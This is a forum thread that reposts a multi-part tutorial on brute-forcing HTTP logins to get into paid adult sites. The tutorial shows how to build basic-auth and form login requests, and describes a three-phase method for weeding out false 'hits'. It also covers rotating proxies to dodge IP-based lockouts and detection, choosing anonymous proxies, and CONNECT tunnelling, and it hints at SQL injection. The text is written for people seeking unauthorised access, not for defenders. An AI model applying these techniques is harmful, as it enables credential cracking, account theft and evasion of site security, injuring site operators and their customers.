Go Back   Xisp.org Forums > Porn Password Cracking > Cracking Tutorials

Brute Force Text by SSS

Reply
Views: 1998 - Replies: 7  
Thread Tools Display Modes

Brute Force Text by SSS
Old 04-01-2005, 05:47 AM   #1
MoonDoggy
Guest
 
Posts: n/a
Threads: 5107
Default Brute Force Text by SSS

this is taken from another forum written by Silver Sand Storm (SSS coder of Form@). it is excellent for beginners,intermediate,and "professional" crackers lol.

Quote:
HTTP Bruteforce: A New Beginning

--------------------------------------------------------------------------------

Introduction


Hello,

This is the first of hopefully a series of posts on HTTP Bruteforcing.

The motivation for this post lies in the evolution of my own understanding on the subject, as well as my realizing that the way I view the subject is quite different from the way most people (especially non programmers) view it.

Since I believe my views are the result of evolution, I therefore believe it will indeed benefit people to try this mode of thinking.

By the end of this series of POSTs, I should have demolished the difference between popup (basic) HTTP auth and form based bruteforcing for one.

This series should also provide a basis for people building programs in the future to use totally different designs....designs that not only are far more flexible and powerful, but also lead to the user learning as well as enjoying that learning.

It is my belief that many of the users of some of the tools that I have written have been forced to think for themselves. Have been frustrated by failure, taken up the challenge to learn, and have enjoyed that learning process.

And that when their initial goal was to gain access to something or the other.

If you enjoy reading this thank Sl@yer and Flyer for suggestions which made this easier to access and read.

Compares favorably to "Using form@ Effectively"
_________________
SSS
(version Infinity)



--------------------------------------------------------------------------------

The current state of Affairs


Lets start off with a brief recapitulation of the current thinking regarding HTTP Bruteforcing.

People today categorize HTTP Bruteforcing into 2 main categories

1) Popup (basic auth)
2) HTML Form bruteforcing

both 1) and 2) would be further subdivided into HTTPS (HTTP over SSL) based sites and normal HTTP sites.

HTML form bruteforcing is further divided into
a) AVS style single login (no username, just password) style systems
b) Regular HTML forms with login and password
c) HTML forms with login, password, and a visually determined access key - what is often called an OCR key.


There exist programs to deal with every such individual task from the list above. Some programs have multiple components which deal with individual such systems. E.g. AccessDiver which has a HTTP popup (basic auth) bruteforcer, and a HTML form bruteforcer, both individual components.

For AVS, an example of a specialized bruteforcer would be the ancient (but still in use) Tyr. For HTML form, HTTP Bugger or form@. For HTTPS popup, MultiHTTPS (and perhaps HTTPS form too, I havent tried). For OCR Caecus.

That is the current state of affairs.




An analysis/critique of the current state of affairs

The current state of affairs really was because a lot of people, at various points of time, decided that it would be cool to write a program that could bruteforce system X - where system X was the first system that came to their mind.

Most adult sites initially did seem to use popup auth - so that became the first target of the programmers. They basically wrote programs that could generate a HTTP header, add to it the basic authorization details, and check the response for acceptance of the authorization, or failure.

AVS systems also seemed to rear their ugly head around then - something that resulted in a few programs having either full AVS functionality or AVS components. Most of these couldnt do full blown forms...just single password (no username) AVS logins.

HTML forms were also the target of programmers... not too many of those forms were used by adult sites though, they were largely the domain of sites like sites offering email/administration of various accounts.

Very often what happened was that a programmer built a basic auth bruteforcer, it worked well, and then users found there were forms out there that the program couldnt to (didnt support forms), and this resulted in a feature request...so the programmer added a form component. E.g. Ad/WwwHack.

So right from the beginning, there was a basic lack of coherent thinking on the whole subject, and a systematic approach. This was the result of a "reactive" approach to security systems, rather than a proactive, positive approach. The idea was...react to the demand...rather than anticipate the demand and build your program to handle them.

This way of thinking explains why most bruteforce programs even today are still pretty sloppy. Sure, they are effective for very specific purposes, but thats it. They arent flexible, nor are they usable for a broad range of systems.


The issue with OverSpecialized Programs

The basic problem with these programs, to repeat, is that they are overspecialized.

They have been developed with the idea of dealing with one, very specific task.

They then were added to, to deal with other tasks.

A lot of the additions occurred without proper testing.

A lot of the additions made assumptions which may not hold (e.g. didnt follow the RFC/specifications fully).

That is one of the reasons we have programs like AD today which has a LOT of specialized components today - many of which dont work very well. Similarly with GE, Ares, WWWHack and many other tools.

So the real issue is with specialization - that is, the building of a tool/component to deal with a *very* specific task, and nothing more.

Specialization implicitly implies lack of flexibility and extensibility. It basically just means, Component X can do task Y. No more, very often less.


There is a different way to do things. Through the eyes of a person who knows. Who understands that the differences between the various tasks being undertaken are just superficial. Who understands that specialization is just the result of people not seeing the whole picture.


Flawed ViewPoint - The Users'


However, it isnt just the programs which are overfocussed and lack a broader view of the whole subject.

Its the users too. The users lack a basic understanding of the subject. They basically pick up the smallest amount of learning that will enable them to start off. Everybody wants the quickest route to success, and ultimately, the quality of their understanding suffers.

As a result, most people dont really have a clue what theyre doing. They understand how to tackle situation X....by using method Y. But how did they find that out? Either trial and error, or by asking somebody, or if they read it somewhere.

Adding to the confusion is the huge number of incorrect texts, partially descriptive texts (the truth but not the whole truth ), posts which are meant to describe how to use tools - but not the why, poorly written texts which end up confusing users....and this spreads using the domino effect...one person ends up confusing dozens of others, and on and on and on.

A beautiful example is "Authentix encryption". Essentially what happened is that a couple of years back or so, people started spotting weird logs from a certain (one of the 2 biggest I guess) billing companies. The company in question had a common log format with DES encrypted passes. The weird logs essentially had passes that users were unable to bruteforce with any tool (e.g. John the Ripper). Also, the users noticed that the Authentication Realm (shown when during popup logins in the site) had at the end "Secured by Authentix". So they assumed that Authentix was the software resulting in such logs, and called the logs "Authentix logs".

Unfortunately for them, they were totally off base. The logs were the result of the billing co switching to a new encryption format *ON IIS - Windows based systems alone!*, based on the Enigma Rotors....because of one of two reasons - either to make things tougher for hackers, or because the normal DES crypt() code was unable on Windows (to them). I think its the latter, the company having a lousy security history...but I could be wrong Smile


So basically...we need to reset our understanding of this subject. Breathe deeply. And dive into it again, this time with the goal of understanding it from scratch.

Screw history.

So lets go!
_________________
SSS
(version Infinity)



--------------------------------------------------------------------------------

A New Beginning

So what is a new beginning all about?

Ultimately its partially a fancy marketing phrase that catches your eye, captures your attention, like the idiot box does to too many people

But its also a statement of intent. A willingness to drop the closemindedness of the past and adopt a new approach altogether to bruteforce.

Its something that you can use as a user. Its something that you can use as a programmer. Its something that you can use as a thinker.

So let us look at the basic definition of bruteforcing over HTTP again


A bruteforce over HTTP can be looked at as series of steps



1) Construct a HTTP request dynamically given certain parameters. Some of these parameters remain the same for every time this series of steps is run. Some change for every time this sequence is run. Some change depending on other events (session expiry on server side for example).
Examples of parameters - CGI GET/POST parameters. Cookies. HTTP header fields like Authorization (used for popup auth), Proxy-Authorization (used for proxy auth), etc



2) Read the HTTP response, and interpret it to put it in one of many categories that are predefined. The interpretation can be done in many ways. One way is keyword matching, if a keyword is present in the response. Another is keyword + position matching - for example, consider the following response header
HTTP/1.0 403 Forbidden
The response code is a keyword found immediately following HTTP/1.0 or HTTP/1.1, and only has a space before it.
Another method is pattern matching...match the entire html response...compare it to the normal response you get for a HTTP request with the parameters set to values that you know will not get you the access you desire

The categories could be - {Successful login, Failed login, Blocked login}
or could be {Parameter Accepted and unusable, Parameter blocked as being undesirable, Parameter Accepted and results in possible vulnerability}

or could be {File Not found, File found but not as expected, File found as expected, File found but not sure if it is the expected file, Internal server error...maybe file present, Forbidden}

And so on and so forth, depending on the purpose of your bruteforce attempt.



3) If the HTTP and the resulting category you find requires you to submit a fresh request with new parameters, do that. E.g. redirection...load the new url. Or say bruteforce...the site tells you username invalid..swap the username and password and retry...


This series of steps is repeated as many times as required, with perhaps many instances (threads which execute this series) of such series being executed simultaneously, with merely different values for the parameter set. THAT is bruteforce.


But is this definition complete?

Definitely not, there are some things to be added



Refining our definition of bruteforce

But what about OCR? Wont that require preprocessing...and other steps? Maybe fetching a new url (image generator) for each request? What about preprocessing it?


So lets redefine things.

Our possible primitives...or functions...or modules....consist of the following types

1) Creating and Submitting HTTP Requests
2) Fetching HTTP Responses
3) Parsing HTTP Headers & HTML Responses
4) Categorizing Responses based on various methods (recognizing visual or OCR codes is one example).


Is that too abstract a definition? A little.

So lets flesh it up with some reality Smile


Consider form@ (I coded it...so I know it in and out). I can and may do the same with some other app in the course of this set of posts.

Form@ can do both HTTP (basic auth) sites and form sites. Why? Because it doesnt differentiate between the two except for the only differences in the parameters REQUIRED to make the login attempt and to detect the kind of attack to make sure the right parameters are sent.

For example, consider your entering a form OR popup (basic auth)url in Form@, and clicking go.

It first uses Module #1 (Construct and Submit HTTP request) to send a HTTP request to the server, a GET request that fetches that url. It then uses module #2, Fetching HTTP responses. Then Module #3, Parsing HTTP and HTML responses, to get it to a form that Form@ can understand. Then module #4, Categorizing the response.

Examples of categories
1) No Form on page
2) Atleast one form on page => load the form manager and display the forms, and allow the user to select the one to attack
3) HTTP Response code 401 => popup auth required => auto select the right url, method (GET) and keywords (401 for failure, 403 for blocking, 200 for hit).

Now the *only* difference form@ uses when it detects the popup attack is to set it up internally to use an extra HTTP header - Authorization. That is the header used to send popup (basic) HTTP authorization. And there are now no form variables to POST or GET. So it just does GET on the url itself without ANY variables (e.g. GET http://url not GET http://url?login=blah).


So thus the user has the flexibility to attack both forms and basic auth sites in the same fashion. The user can also specify keywords for the basic auth sites (as in Sentry), of all kinds - Failure, Blocking, Success.

Where then is the difference between form and basic auth sites?

Not in the program. The difference is in the way the user handles them - completely up to the user! Forms do require extra handling of issues like cookies.

However, the user now sees basic auth bruteforce as a simpler case of form bruteforcing. That is a vital difference. Which destroys the obscurity of the users understanding of popup bruteforcing!

An example will follow.


Camera Obscura, or the fake wisdom on Fakes

Everybody talks about fakes. Heck, somebody was telling me about the Thomas Crown affair today in which the Monet was a fake Considering the domain to be bruteforcing...everybody talks about fakes....

So what the hell are fakes?

Fakes, the way most people define them, are username/password pairs...or to generalize it further, SPECIFIC values for a set of parameters
(e.g. w900 pins).

It could be
{username=blah, password=blah2, email address=blah2blah.com} for example (toughie )
or
{password=1067blah}
etc.

There is one problem with these specific values. Even though the bruteforce program in question identifies them as valid for the access sought on the site, they arent. In other words, they simply dont work!

I just read some excellent tutorials on getting rid of fakes. For those who took me literally, please read up on sarcasm The texts in question showed that either the writers didnt know the full story about fakes, or knew it and wrote crap out of laziness.

So lets talk about fakes, using our definition from above. Further, lets restrict it to an AVS style system, where we are bruteforcing one password (the system doesnt matter - it could be ANY such system...AVS is simplest, saves my finger flesh )
We are using program X, we have set it up as we wished, and we are getting passwords which dont work. Currently lets assume the program has no fake detection inbuilt.

Lets assume that our module (1) Construct and Send HTTP response is fine. Otherwise every attempt will result in a `fake`. So we would know right away and change the construction of the request (variables used, POST/GET/HEAD, cookies, etc).

Also assuming we are using proxies - one proxy for each request, rotating.

WHAT DO WE DO???

We think.

Why could the program be getting passwords which dont work?

Simple, either the response from the site isnt as expected, OR, we are not categorizing it properly - an invalid password response or blocked response is being seen as a successful response.


Quote:

(I) Response from the site isnt as expected - what could have happened ?
a) The proxy server sent us an unexpected response
This could be because the proxy server failed to get the response from the site (network or other error). OR the proxy server will not work on any request to this site (either site is one of the blocked sites, or its not a proxy server but a webserver, or the proxy server requires authorization, or its down, etc).
So both cases need to be handled {#1 and #2}. Note them down. Done?
Lets continue.

b) The site sent us an incomplete response...or some random error occurred (network error, or the site went down...)
Again needs handling.{#3}

c) (RARE) The site could not handle the exact password we sent it. Perhaps the password had invalid characters? (hint sql injection ) This is VERY rare. But happens. And should be looked for, its a nice way in
Needs user based handling



Quote:

(II) Incorrect categorization
a) The site has sent us a new response which we didnt bargain for. Example, expired account! Or a different failed login page (password too short!)
Whats to be done? Add the keywords to the list...or improve our categorization.

b) The site has setup a random blocking mechanism as described in one of my other essays somewhere It is basically throwing random errors as a way to try to defeat bruteforce programs. For example, it could just output a random HTTP response code, and load a random ad banner from an affiliate.
So another thing to be handled. {#4}




So how do we handle these? Onward!


Handling Fakes, or Finessing the Faker with finesse!

Or finishing the faker with finesse

So lets look at how a program would handle fakes.
A program would need to handle fakes by handling {#1} to {#4}
Now at this stage, I must acknowledge the efforts of a much maligned individual (I will not pass judgement on to what extent the maligning was deserved Edit - this doesnt make sense. Much reviled individual is better, and I will not pass judgement on to what extent the reviling was deserved) called Jean. He had quite a nice idea regarding fake detection (implemented rather badly in code)
Ultimately I refined it a little, and implemented it in form@ with some addition conditions.
Finally this is the way it stands...

Quote:

Phase I
=>If
a) Failure keys absent, Success Keys absent, Blocking Keys absent, then mark it as a possible hit and deal with it. Dont check further.
b) Success Keys present, mark it as a possible hit and deal with it. Dont check further.
c) Blocking Keys present, mark it as a *block* and add 1 to the # of blocked responses from the proxy used
d) Failure keys present, mark as a miss and move on to next password in list.
=>If its a possible hit, move into phase II.



Quote:

Phase II
=>Do :-
i) Generate a random password (long enough to definitely not work) and send it to the site, read the response.
ii) If the response yields a possible hit using a) or b) from above, then somethings wrong! A random pass yielding a possible hit too! Obviously a fake of some sort ! Flag the proxy for faking and retry the original Pass X with the next proxy from list
iii) If the response yields a blocked response from c) above, then rotate proxies and try the random pass (why not pass X? Because of Phase III which does just that again )
iv) If the response yields a MISS from d) above, then great! Thats expected! Move onto Phase III


Quote:

Phase III
=>Do :-
i) Redo Phase I
ii) If the response gives us a possible hit using a) or b) from above then we are in! Mark as a genuine hit!
iii) If the response yields a blocking from c) above then ouch - seems unlikely - but who knows, may happen - so just redo the whole process from scratch with a new proxy
iv) If the response yields a miss from d) above, then obviously the Phase I gave us a wrong response. But that wrong response came only once. So chances are it was due to a network error or site error (temporary). So treat it as a miss and move on. (can be refined to deal with Phase I giving us success keys present but Phase III giving us those absent - weird case).



So...when can this fail and give us a fake pass?
This requires
=>Phase I - hit
=>Phase II - miss
=>Phase III - hit
So both Phase I and Phase III need to be hits, although the pass doesnt work. And Phase II needs to be a miss.

There are three possibilities
Quote:

1) Phase II is a miss if not using any failure keys, and the response is incomplete....so ensure the user uses atleast ONE failure key

2) Phase II is a miss if user's failure keys are present on pages other than the missed login page (e.g. blocked page or network error page). So...the user MUST use unique failure keys

3) Phase II is a legitimate miss
a) Phase I is a legitimate hit, but somehow the pass got locked out after that either on Phase II try or Phase III ===> Very Rare. Requires smart, hardworking, and hacker webmaster Find me ONE such!

b) Phase I and Phase III were responses SPECIFICALLY for that combo - locked out, etc => User can easily detect such if the response is logged. Then add a new category...blockedcombo keys (didnt do in form@)

c) Phase I and Phase III were both network errors => RARE! and Phase II worked!



So...look at the chances of failing...pretty low!
Quoting...
Code:

iii) If the response yields a blocked response from c) above, then rotate proxies and try the random pass (why not Phase I? Because of Phase III which does just that again ;))


Now Phase III would ensure that the pass was indeed valid. Some risks in there too...this is a route to getting some fakes, but very low probability. So a safer way might be to go to Phase I again with the proxy.

Now lets relook at this fake engine with respect to the cases I covered above (proxy errors, site errors etc!).



Continuing the Fake Engine Analysis
Quoting
Code:

The #1-#4 cases to be handled.
I) Response from the site isnt as expected - what could have happened ?

a) The proxy server sent us an unexpected response
This could be because the proxy server failed to get the response from the site (network or other error). OR the proxy server will not work on any request to this site (either site is one of the blocked sites, or its not a proxy server but a webserver, or the proxy server requires authorization, or its down, etc).

So both cases need to be handled {#1 and #2}. Note them down. Done?
Lets continue.

b) The site sent us an incomplete response...or some random error occurred (network error, or the site went down...)

Again needs handling.{#3}

(II) Incorrect categorization

b) The site has setup a random blocking mechanism as described in one of my other essays somewhere Wink It is basically throwing random errors as a way to try to defeat bruteforce programs. For example, it could just output a random HTTP response code, and load a random ad banner from an affiliate.

So another thing to be handled. {#4}



Our analysis :-
Quote:

#1 => Proxy failed to get the response from the site. This is clearly handled. Why? Lets say it fails for Phase I and Phase II. Then the program will rotate proxies. If it fails for Phase I and Phase III but not Phase II...thats weird, d00d! Its unlikely to happen, but will fake us. If it fails for Phase II alone, that will auto cause the program to rotate proxies.

#2 => Proxy will fail Phase I and II, and thus get autorotated

#3 => Error from site. Just a random error, wont repeat. If it happens at Phase I only, then Phase III will give us a miss and set things right. If it happens at Phase II, then Phase II may report incorrectly as a hit. Proxy will be rotated and things will resume as expected If it happens only at Phase II, and Phase II incorrectly reports as a miss, then we can get a fake. But think of the likelihood of Phase I and Phase III being hits (because of site blocking the proxy IP) and Phase II hitting such an error. Again low.

#4 => Site is blocking randomly...it has to block Phase I and Phase II and let Phase III through for a possible hit. Phase I and Phase II would appear to be hits if the failure keys were absent (success keys if chosen well cant be present). Again probability is lowww! Chances are, it may send us to random urls, but for each attempt - so that Phase II also would give us a hit. Note this is blocking the proxy IP.



So all cases are handled. There are some possible error pressure points. Thats for future improvement

Obviously, the onus is on the user to choose
1) Success Keywords (if any)
2) Failure keywords (ENOUGH OF THEM!)
3) Blocking keywords (ANY and ALL UNIQUES, One per blocking page)

--------------------------------------------------------------------------------

Fake Engine Concluded
So before I move on beyond this fake engine, let me answer a couple of possible queries.

Quote:

1) Wont this method...of testing passes multiple times kill proxies?
Yes it will. On the other hand, proxies are cheap. Passes to that tough bitch of a site arent. If proxies ever become valuable (e.g. site which allows 1 attempt per IP), then you will have to modify your approach.

2) Wont it kill working passes?
Working passes will die if used from multiple IPs at a time. So this may happen if
=>Phase I hit
and either
=>Phase II miss
=>Phase III error => rotate proxies and redo from start
or
=>Phase II error => rotate proxies and go to Phase I or Phase II again.



1) The first case can be avoided by retrying on Phase III errors, and if they repeat, adding the pass to a special *maybe hit* list to be retried after a specific time interval.

2) The second case can be handled by retrying on Phase III errors and if they repeat, blah blah as above.


Form@ doesnt do either of the above. Likelihood of either isnt high of course. But nonzero.

So...is this the best fake engine? The ideal fake engine? Uber H4xorTech? L33tness beyond description? The all weather wunderdog?

No. (atleast not the wunderdog!)
It is just one fake engine.
It works against the majority of sites. But it has its defects, and they have non zero probabilities of occurrence!

Example of a flaw. Lets say we have a site allowing n attempts per IP (eg vbb) Then every extra attempt costs you! Far better to get a list of hits including fakes without using the fake engine (ah yes, form@ fake engine is togglable!) and then filter them with another run at the site.

So what the hell is my point? Ive spent an hour writing about fake engines and you've spent as long or longer?

My object has been :-

1) I want YOU to understand what a *fake* is - for the first time ever, you may understand that most people dont have a clue what a *fake* really is.
2) I want YOU to understand how I came up with a generic fake engine for form@
3) I want YOU to understand where this engine fails or atleast, that this engine CAN fail and DOES fail
4) I want YOU to understand that NOTHING can ever be used for all sites. There will always be sites left out. Sites which perform badly. Weird cases.

In short
Your above reading has been almost useless. Except for one thing. It has given you


UNDERSTANDING!



Also...it has shown you how easy it is to accept a method as being the right way to do something, and ignore the flaws.

PS: It has also been fun leading you up the garden path on the previous post

Where do we go from here?

Now fake engines are *after the request* checkers. All they do is really handle the task of *parsing response* and *categorizing it*, using a hack to use the *construct and send request*.


What about the request construction itself?

Any HTTP request consists of the following elements

Quote:

1) Method => GET, HEAD, POST, PUT, DELETE, OPTIONS, TRACE, SEARCH, CONNECT...etc

2) URL => also called URI or `link` In the form
protocol://serveraddress/path?QUERYSTRING

=>protocol can be http, https, ftp, etc.
=>serveraddress can be a fully qualified domain name (just a ruddy hostname, can have a subdomain) or an IP address.
=>path is path to file on that server

3) Header fields a set of Key: Value fields
Basically trying to say Key1=Value1, Key2=Value2 etc.
E.g. Host: www.google.com (Host=www.google.com)

4) QUERYSTRING as in #2 => any input to be passed to the file at /path
e.g. a=b&c=d&e=f&g=h

5) BODY => this can be a POST's inpurt, or a binary body, for example if uploading file or POSTing a file.



All of these are under our control (they better be!)
A question hits us.
How do we *construct* a HTTP request for our bruteforce?
Answer: Depends on what we want to do!

Lets cover a few examples now


Basic (Popup) Auth


Method => GET, POST, PUT, HEAD, all will work Any {request method, url} combination can be protected by Basic authorization.
As long as the URL in question supports the specified method. Note that if the method isnt supported, the site will throw a 405 Method Not Allowed HTTP error, so you cant try bruteforcing using a method the script doesnt support..that wont throw 401 (Authorization Required).

URL => URL to attack.

Headers =>
=>Host: servername e.g. Host: deny.de
=>User-Agent: USERAGENT e.g. User-Agent: Mozilla/6.0(Helps identify browser. )
=>Authorization: BASIC <auth> where <auth> = Base64(username:password) E.g. Base64("moocow":"movies"). Opinionatedgeek.com has a nice base64 online decoder/encoder.

BASIC shows that it is BASIC (base64 auth).


All other headers are optional. We add some to make the request look like the request a normal browser would generate. That isnt really necessary.

If we are doing a POST, there will be a POST body. Unlikely to be used, so not covering right now - refer to the below section (form auth) if curious.



Form based Auth

Form based auth can be done via only 2 request methods - POST and GET. Why not any others? Primarily because thats what these methods are intended to be used for.

Look at it this way. Basic auth can be used to *protect* any method+url.
POST and GET are required to even *do* Form auth

POST and GET essentially are used to do form auth with URL's which are not just html pages, but are Server Side Scripts (SSSs ) written in scripting languages like ASP, PHP, CFM for coldfusion, JSP, Perl, C, etc.

Now somebody out there is going to read this and say "What the heck, Ive seen this form whose action (url to POST/GET) is index.html or login.html. How can that be?"

Simple....PHP is one example of a scripting language that can be embedded in HTML. That is, a PHP script consists of blocks of php code and HTML text. The PHP code is rendered (interpreted) or executed by the server when displaying the page, and the HTMl blocks are just displayed directly.

The httpd.conf of such servers (on apache obviously) is setup to allow even .html files to be processed by the php interpreter. If the file has no php blocks, nothing lost, because its just displayed directly by the interpreter, which is all that is wanted.

So now, we have GET/POST sending input or user supplied data to a script. The url of the script is labelled "Form Action".

The input is in the form

variable1=value1&variable2=value2&variable3=value3 ..... and so on

Its basically a set of {variableX = valueX} pairs separated by & (ampersands).

Now this input - lets call it $Input can be passed to a GET / POST in the following way :-
1) GET
Just make the request GET url?$Input instead of plain GET url

2) POST
The http request becomes
Quote:

POST url HTTP/1.x
Header1: value1
Header2: value2
.
.
.
HeaderN: valueN

$Input


Note the extra blank line after the end of the header fields...thats to allow the server to detect the end of input.

So now our problem is reduced to the following problem :-

1) Which method do we use - GET or POST?
The html form generally has it in the <form> tag e.g
<form method = "POST" action = "posting.php">

If it doesnt *explicitly* state the method, then there are two options
(a) The form is submitted via JavaScript => somewhere you'll see a
document.forms[1].submit() or something of the sort.
The method is POST
(b) The form isnt submitted via Javascript => Javascript may be used but no submit()
The method is GET

2) Which url (action) do we use?
The html form tag again as above has an action specified.
If not, javascript might be used to specify a form action => read the javascript and figure it out
If not, the form action is the *same* url as the url of the page that the form is to be found on.

3) What HTTP headers do we use?
The Host header needs to be the servername of the url. The Referer needs to be the url on which the form is found. Others are more or less free, with one additional fixed header for POSTs:
Content-Type: application/x-www-form-urlencoded

just to let the server know this is form data coming along in the Body (body is the section AFTER the http header) of your request

Other headers can be used to emulate the browser of choice. Of course, if you want true emulation of IE, you might also want to make them non RFC (specifications) compliant

4) What Input do we use?
Crucial question. We need to understand how HTML form data gets converted into input.
HTML forms may have text fields, password fields, drop down lists, radio boxes, checkboxes, Submit type buttons, Image type buttons, even file upload dialogs (lets ignore those for now, we aren't going to upload a file everytime we login ) Oh and lets not forget hidden tags.

Each such field/form element has a Name. The value is user supplied in the following manner :-
Quote:

text/password fields : the value is the user entered string
hidden fields: the value is specified in the html tag itself.
checkboxes: value is 1 if checked, if unchecked I believe the checkbox is just ignored if I recall correctly.
Drop down list: every entry in the list has a corresponding value field with a pre-entered value. That is used.
radiobuttons: a group of radiobuttons which represent one choice is setup this way - each radiobutton has the same Name, but a different value from the others. On selecting one, the value assigned to the radiobutton group Name is the selected radiobutton's value from the html tag for it.



Now just cluster the {Name=Value} pairs and add the & (ampersands) in between and the Input is constructed

So we now know how to construct form login requests too

Proxy Auth

Just for fun Free bonus!

Look up popup auth. Rename the Authorize field to
Quote:

Proxy-Authorize



Use any url which should give you a HTTP 200 (unprotected url).

All else remains the same Only now the responses are HTTP 407s (Proxy Authorization Required) instead of HTTP 401s.

--------------------------------------------------------------------------------

So Whats the BIG deal about these Requests?

Nothing.

Theres a specification, thats very well documented. There are tons of programs which use the specification and which can be monitored to examine the data sent, in case your too lazy to read the specs, or they are written too cryptically.

All it requires is a little effort, and building the request you need to accomplish the goal in mind is ...ridiculously easy!


So..since I have nothing else to discuss under the Request head, I might as well make a digression and answer a couple of other questions.

IFAQ
InFrequently Asked Questions, or phonetically speaking a proposition

Q) Am I selling form@ a little bit too much ?
A) Perhaps so. Obviously form@ is a partial implementation of my way of thinking. So if Im selling you my way of thinking - which is to be able to do everything for yourself, no matter what it is - Im indirectly selling you form@.
However this isnt exclusive. There are many other tools which are pretty decent. I just cant comment on *how* decent, and it doesnt matter. If you pick up the ability to do things on your own, you will not remain tied to form@ or any other tool, and their limitations. Examples of such tools might include Sentry, MultiHTTPs, HTTPBugger, HScanner, etc.

Q) Isnt this a little tough for somebody new?
A) If your new, and theres anything you dont understand, theres a post for comments on this thread. If not, save your energy

Q) Why is form@ `final`?
A) You should have figured out by now...if you've really been riding the mood of this thread. If not...hang in there, theres more to come

Q) I have and continue to discuss micro-techniques..e.g. the fake engine. Is the technique you present the best way to do things?
A) No. Perfection is not something you can ever achieve. That being said, the idea of discussing them is to show you how simple it is to really create such techniques - rather, rediscover such techniques on your own. Once you've been there its much easier to go back

Q) Is this over?
A) Will it ever be?

--------------------------------------------------------------------------------

What Next?

Now we come to yet another area of interest to bruteforcers of all sort, of every shape and size.

And that is, avoiding detection, as well as evading IP address based filters (N login tries from 1 ip results in that IP being blocked).

The most common technique to do so is to use a list of proxy servers.

Lets start off by nitpicking on one definition here. When we say proxy servers, we usually mean HTTP proxy servers. Those are proxy servers that support the HTTP protocol. They may also support the HTTPS protocol, and the FTP-via GET method protocol.

A proxy server is basically a piece of software running on some computer on the web, which accepts a HTTP request, processes it, performs the request, and fetches the HTTP response, processes it, and passes it back to the requesting machine.

So how does one use a proxy server to execute a HTTP request?

All one needs to do to use a proxy server is execute the following sequence

1) Connect to the proxy server on the port specified
2) Send in a modified HTTP request
3) Read the response

The only differences between this and a normal non proxied HTTP request is that we connect to the proxy server on the port specified, rather than the site, port 80 (or whichever port the HTTP server is running on), and that the request is modified a little.

How is the request modified?
In the case of the unproxied request, the URL used is the relative path only (doesnt contain the server name OR the protocol string)

i.e. the request reads
GET /movies HTTP/1.0 (unproxied case)
rather than
GET http://www.clonedcowporn.com/movies HTTP/1.0 (proxied case).

There is no real reason for this. It just is. (Just like the internet!)
If the above url belongs to you, it is in extremely bad taste. Despite that we are not discussing an attack on it in any fashion. So go away!

There are other *possible* differences to the HTTP request. For example,. you can ask the proxy server not to cache the response from your request. You can ask it to keep the connection to the remote server alive, so you can pump in a series of requests (HTTP pipelining). That way, the remote server can just keep pumping the responses back to you, without waiting for you to send a new request each time. Helps a lot when used to load html pages for example....just read all urls of all images on the page, pipeline the requests, render them as they come down without wasting time rerequesting.


So proxies obviously hide your IP from the remote server because the remote server sees that the request is coming from the proxy server.

But...yes, there is a but, that isnt always the case.

Thats because somebody/bodies in their infinite wisdom thought it would be a nice idea to allow proxies to send along with their request a HTTP header field containing the IP address. So your IP is no longer hidden from the remote server. (a common name for such a field is HTTP_X_FORWARDED_FOR)

Of course, some proxies dont do that, but still stick to a lesser evil. Their desperate urge for notoriety encourages them to tack on a header field showing that the request is being performed by a proxy on behalf of some
other computer. So the site knows you are using a proxy. It just doesnt know what your IP is.(A common name for such a field is VIA or HTTP_VIA) Why is this evil? Your not particularly well hidden if everybody knows your hiding!. Very often sites block IPs that send requests with this tag attached - I know one very popular OCR script that can be used with this option turned on - it can be used to block all IPs that send VIA without the HTTP_X_FORWARDED_FOR.


So now we come to a controversial topic...

ProxyJudges and Anonymity!

Whats the right approach? What does level 1 mean? Should I use only level 1? Only Level 1-3? Any Level?

I really dont know and dont care. The proxyjudge script looks to me as a programmer as if it was written by somebody on a mix of vodka and hash. And the ratings seem totally subjective - which isnt a good thing.

There can be only two issues as far as a proxy goes
1) Does it reveal your IP to the remote server?
2) Does it reveal to the remote server the fact that the request is from a proxy server?

The first is anonymity (or lack of). The second is notification-of-proxying.

The ideal proxy does neither. The not so ideal proxy does only #1. The rest arent worth discussing


So why use a proxyjudge? Because the output of the ProxyJudge can be used to figure out the answers to the 2 questions posted above. Thats what programs like Charon and ProxyRama do.

Quote:
"Does any other factor X matter when it comes to proxies? Somebody told me it does!"

Figure out for yourself. Use the logic above. Question the factor. See why it might affect you. And make the decision.

Dont believe the crap which people dish out to you but can't justify. I posted about proxy levels years ago on deny public. GaaMoa has for years been saying pretty much the same thing. A lot of people consider them pretty useless. Yet, to this day, I speak to experienced individuals who swear by them, without having a clue what they swear by. I dont have a clue either (due to the chaotic nature of the script), I just dont swear by them

Also...dont believe blindly that *Y* program is the best. I like Charon, ProxyRama, and my own CheckThrough (specific purpose). But I dont swear by them. I remember people who used to swear by (ahem) AATools some time back. I dont see any of them around any more....

Question yourself at every stage, and you will not stick to any single tool or judgement - thats because you will not believe in anything blindly, you will know.


CONNECT Proxies/Tunnelling Proxies/SSL Proxies/IRC Proxies

These are all basically very different names for one class of proxy servers...a subset of the entire set of HTTP proxy servers.

Essentially when the good folks over at w3c came up with the HTTP 1.0 specifications, they soon realized the need to extend these specifications.

Thats because these specifications did not allow for a new protocol they needed to be able to use from behind proxy servers - the HTTP over SSL/TLS protocol, also called HTTPS.

This protocol was designed to be superbly extensible. So much so that the basic backbone of this protocol is a direct TCP pipe from client to server, so that every bit of data sent from client is passed to server and vice versa.

So the proxy server can perform NO processing on the actual data sent back and forth. It has to forward it in both directions without altering it. Thats because the data is encrypted, number one. Two, if the proxy server alters it in any way, then extending the protocol or upgrading it is going to break the protocol because the proxy server understands only the older version of the protocol.

Also, they realized that this setup would be a goldmine - now they could allow direct TCP tunnelling through proxies - you could essentially use proxy servers for pseudo-direct TCP connections to any server and port. So now you could telnet through the proxy without worrying about the proxy being able to speak the telnet protocol ! Or do irc, etc.

With this in mind, they created a new HTTP method, CONNECT.

A CONNECT request is sent in the following way :-

CONNECT host:port HTTP/1.1
Header1: blah
Header2: blah

etc.

It really needs practically NO headers. Maybe one for Proxy-Authorization.

What the proxy server does when receiving such a request is

1) Sees if CONNECT is allowed within its configuration. If not, it sends a 403 (Forbidden) or 501 (Method Not Implemented) HTTP response back.

2) If CONNECT is allowed, check if CONNECT to that specific port is allowed. If not, send a 403 Forbidden response back.

3) If all fine so far, try to connect to the host on the given port. If it fails, throw a 503 HTTP error (server down). If it times out throw a 502 or 504 Gateway Timeout.

4) If all fine, and connection established, send a HTTP 200 Connection Established, alone with an optional HTTP header to the client
Via: ProxyServerSoftwareBrandName

e.g.
Via: Squid/2.5 (free and cheap advertisement )

